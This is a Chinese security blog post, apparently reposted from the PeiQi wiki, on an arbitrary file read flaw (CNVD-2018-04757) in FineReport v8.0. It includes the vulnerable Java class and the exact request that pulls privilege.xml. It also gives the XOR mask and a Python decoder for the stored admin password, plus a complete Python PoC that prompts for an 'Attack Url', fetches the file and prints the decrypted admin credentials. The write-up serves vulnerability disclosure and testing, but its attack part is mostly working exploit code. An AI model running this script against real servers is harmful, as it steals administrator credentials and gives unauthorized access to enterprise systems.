帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757

admin 2021年3月22日12:09:27评论8,142 views1字数 5632阅读18分46秒阅读模式

:漏洞描述🐑

FineReport报表软件是一款纯Java编写的,集数据展示(报表)和数据录入(表单)功能于一身的企业级web报表工具。

FineReport 8.0版本存在任意文件读取漏洞,攻击者可利用漏洞读取网站任意文件。

 

二:  漏洞影响🐇

 

FineReport < v8.0

 

三:  漏洞复现🐋

 

出现漏洞的文件为 fr-applet-8.0.jar

package com.fr.chart.web;
import com.fr.base.FRContext;import com.fr.general.IOUtils;import com.fr.stable.CodeUtils;import com.fr.web.core.ActionNoSessionCMD;import com.fr.web.utils.WebUtils;import java.io.InputStream;import javax.servlet.http.HttpServletRequest;import javax.servlet.http.HttpServletResponse;
public class ChartGetFileContentAction extends ActionNoSessionCMD {    public ChartGetFileContentAction() {    }
    public void actionCMD(HttpServletRequest var1, HttpServletResponse var2, String var3) throws Exception {        String var4 = CodeUtils.cjkDecode(WebUtils.getHTTPRequestParameter(var1, "resourcepath"));        if (!WebUtils.invalidResourcePath(var4)) {            InputStream var5 = FRContext.getCurrentEnv().readResource(var4);            String var6 = IOUtils.inputStream2String(var5);            var6 = var6.replace('ufeff', ' ');            WebUtils.printAsString(var2, var6);        }    }
    public String getCMD() {        return "get_geo_json";    }}

使用request将文件名传入 调用cjkDecode函数解密文件名

使用invalidResourcePath函数校验文件是否存在

最后使用readResource函数读取文件传输到浏览器上 默认目录为resources

其中的privilege.xml里面存储了后台的用户名密码

<?xml version="1.0" encoding="UTF-8"?><PrivilegeManager xmlVersion="20170715" releaseVersion="8.0.0" fsSystemManagerPassSet="true" birthday="0" male="false"><rootManagerName><![CDATA[admin]]></rootManagerName><rootManagerPassword><![CDATA[___00520017004e002b004100b7004200250023007f003d003d005400e4001c0057]]></rootManagerPassword><AP class="com.fr.privilege.providers.NoAuthenticationProvider"/><ForwardUrl><![CDATA[${servletURL}?op=fr_platform]]></ForwardUrl><PVFILTER class="com.fr.fs.privilege.auth.BasePrivilegeFilter"/></PrivilegeManager>

# 加密函数public static String passwordEncode(String var0) {        StringBuilder var1 = new StringBuilder();        var1.append("___");        if (var0 == null) {            return var1.toString();        } else {            int var2 = 0;
            for(int var3 = 0; var3 < var0.length(); ++var3) {                if (var2 == PASSWORD_MASK_ARRAY.length) {                    var2 = 0;                }
                int var4 = var0.charAt(var3) ^ PASSWORD_MASK_ARRAY[var2];                String var5 = Integer.toHexString(var4);                int var6 = var5.length();
                for(int var7 = 0; var7 < 4 - var6; ++var7) {                    var5 = "0" + var5;                }
                var1.append(var5);                ++var2;            }
            return var1.toString();        }    }
# 解密函数public static String passwordDecode(String var0) {        if (var0 != null && var0.startsWith("___")) {            var0 = var0.substring(3);            StringBuilder var1 = new StringBuilder();            int var2 = 0;
            for(int var3 = 0; var3 <= var0.length() - 4; var3 += 4) {                if (var2 == PASSWORD_MASK_ARRAY.length) {                    var2 = 0;                }
                String var4 = var0.substring(var3, var3 + 4);                int var5 = Integer.parseInt(var4, 16) ^ PASSWORD_MASK_ARRAY[var2];                var1.append((char)var5);                ++var2;            }
            var0 = var1.toString();        }
        return var0;    }

# 使用python写出的解密代码为cipher = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' #密文PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23] #掩码Password = ""cipher = cipher[3:] #截断三位后for i in range(int(len(cipher) / 4)):    c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)    c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]    Password = Password + chr(c2)print (Password)

这里使用上面讲述的原理进行复现,访问目标

帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757

路径分为两种/WebReport/ReportServerReportServer

访问POC为,读取密码文件 privilege.xml

/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml

帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757

使用解密脚本解密文件

帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757

得到密码,即可登陆后台系统,账户为 admin

帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757

 

 

 四:  漏洞POC🦉

import requestsimport sysimport refrom requests.packages.urllib3.exceptions import InsecureRequestWarning
def title():    print('+------------------------------------------')    print('+  �33[34mPOC_Des: http://wiki.peiqi.tech                                   �33[0m')    print('+  �33[34mGithub : https://github.com/PeiQi0                                 �33[0m')    print('+  �33[34m公众号  : PeiQi文库                                                   �33[0m')    print('+  �33[34mVersion: 帆软报表 v8.0                                              �33[0m')    print('+  �33[36m使用格式:  python3 poc.py                                            �33[0m')    print('+  �33[36mUrl         >>> http://xxx.xxx.xxx.xxx                             �33[0m')    print('+------------------------------------------')
def decode_passwd(cipher):    PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23]  # 掩码    Password = ""    cipher = cipher[3:]  # 截断三位后    for i in range(int(len(cipher) / 4)):        c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)        c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]        Password = Password + chr(c2)    return Password
def POC_1(target_url):    vuln_url_1 = target_url + '/WebReport/ReportServer'    vuln_url_2 = target_url + '/ReportServer'    headers = {        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",    }    try:        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)        response_1 = requests.get(url=vuln_url_1, timeout=5, verify=False, headers=headers)        response_2 = requests.get(url=vuln_url_2, timeout=5, verify=False, headers=headers)        if "部署页面" in response_1.text:            print("�33[32m[o] 目标部署页面为: {} �33[0m".format(vuln_url_1))            POC_2(vuln_url_1)        elif "部署页面" in response_2.text:            print("�33[32m[o] 目标部署页面为: {} �33[0m".format(vuln_url_2))            POC_2(vuln_url_2)        else:            print("�33[31m[x] 目标漏洞无法利用 �33[0m")            sys.exit(0)
    except Exception as e:        print("�33[31m[x] 目标漏洞无法利用 {} �33[0m".format(e))        sys.exit(0)
def POC_2(vuln_url_fileread):    vuln_url = vuln_url_fileread + "?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"    try:        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)        response = requests.get(url=vuln_url, verify=False, timeout=5)        print("�33[32m[o] 正在访问: {} �33[0m".format(vuln_url))        if "rootManagerPassword" in response.text and response.status_code == 200:            print("�33[32m[o] 目标存在漏洞,读取敏感文件 n{} �33[0m".format(response.text))            user_name = re.findall(r'<![CDATA[(.*?)]]></rootManagerName>', response.text)            cipher = re.findall(r'<![CDATA[(.*?)]]></rootManagerPassword>', response.text)            password = decode_passwd(cipher[0])            print("�33[34m[o] 后台账户密码为:{} {} �33[0m".format(user_name[0], password))        else:            print("�33[31m[x] 目标 {}不存在漏洞 �33[0m".format(target_url))    except Exception as e:        print("�33[31m[x] 目标 {} 请求失败 �33[0m".format(target_url))
if __name__ == '__main__':    title()    target_url = str(input("�33[35mPlease input Attack UrlnUrl >>> �33[0m"))    POC_1(target_url)

 

帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757

Goby & POC 目录以更新 帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757 文件https://github.com/PeiQi0/PeiQi-WIKI-POC/tree/master/Goby%20%26%20POC

 

帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757

 

 

本文始发于微信公众号(PeiQi文库):帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年3月22日12:09:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757https://cn-sec.com/archives/297038.html

发表评论

匿名网友 填写信息